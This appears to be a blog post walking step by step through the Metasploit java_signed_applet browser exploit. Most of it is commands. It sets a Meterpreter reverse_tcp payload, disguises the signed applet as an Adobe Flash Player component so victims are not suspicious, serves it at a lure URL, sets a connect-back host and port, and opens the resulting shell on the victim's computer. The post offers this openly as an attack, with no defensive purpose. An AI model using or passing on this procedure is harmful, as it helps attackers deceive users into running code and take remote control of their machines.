Java_signed_applet
Requirement :
1. Metasploit Framework
2. Operating System(I’m recommend using Linux OS or Backtrack 5)
Step By Step :
1. Open your msfconsole and find java_signed_applet exploit with command search java_signed_applet. If you can’t find it, try to update your Metasploit Framework to newer version with msfupdate command
use exploit/multi/browser/java_signed_applet ---> load the java_signed_applet exploit
set payload windows/meterpreter/reverse_tcp ---> set the reverse_tcp meterpreter to connect back
2. The next step, we need to add some required switches to make an attack successful. The picture below is my switches configuration, but if you want to view available switches, you can type show options.
set appletname Adobe_Inc ---> To inform the victim about the name of our java applet and make sure your victim
not suspicious with link you give
set certcn Adobe Flash Player ---> On older versions the dialog will display the value of CERTCN in the
"Publisher" line. Newer JVMs display "UNKNOWN" when the signature is not trusted (i.e., it's not signed
by a trusted CA).
set srvhost 192.168.8.92 ---> host that served the exploit
set srvport 80 ---> I'm choose 80, because it's really great for computer social engineering especially social engineering
via website
set uripath videoplaylist ---> the URL format to send to victim (http://192.168.8.92/videoplaylist)
set lhost 192.168.8.92 ---> connect back address when successfully perform attack
set lport 443 ---> port used to connect back to our machine
3. When everything has been set up correctly, run exploit command.
There’s an URL you should give to your victim http://192.168.8.92/videoplaylist.
4. When the victim open that link in their browser, immediately it will alert a dialog box about digital signature cannot be verified
5. After victim open the malicious URL and click RUN,
6. Press CTRL + C to stop the process or you can directly run sessions -l to view the active sessions.
7. Yes we have 1 active sessions in our list. To interact with that session, simply run sessions -i 1 where 1 is the ID of the sessions.
PWNED! we’re already inside victim computer.
Enjoy ;)
No comments:
Post a Comment